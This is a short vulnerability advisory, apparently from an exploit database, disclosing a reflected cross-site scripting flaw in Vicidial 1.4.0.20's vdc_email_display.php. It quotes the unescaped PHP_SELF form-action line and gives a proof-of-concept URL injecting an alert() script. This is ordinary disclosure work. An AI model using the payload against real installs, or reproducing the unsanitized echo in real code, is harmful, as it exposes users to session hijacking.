Vicidial 1.4.0.20 Cross Site Scripting

2016.06.17

Credit: David Silveiro

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Vicidial 1.4.0.20 - Reflective XSS
# Date: 0 day
# Exploit Author: David Silveiro
# Exploit Author Github: github.com/davidsilveiro
# Vendor Homepage: http://vicidial.org
# Software Link: https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download
# Platorm: PHP

Vicidial is an opensource contact center suite, with outbound and inbound calling as well as many other features.

Vulnerability:

  vdc_email_display.php suffers from a reflective XSS vulnerability from
  unsanitized user input from;

  $_SERVER['PHP_SELF'] on line 387

  And then echoed...

  <form action='<?php echo $_SERVER['PHP_SELF']; ?>' method='get' name="email_display_form" id="email_display_form" onSubmit="if (this.submitted) return false; this.submitted=true" enctype="multipart/form-data">
    
POC:

http://127.0.0.1/vdc_email_display.php/<script>alert('XSS')</script>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Vicidial 1.4.0.20 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.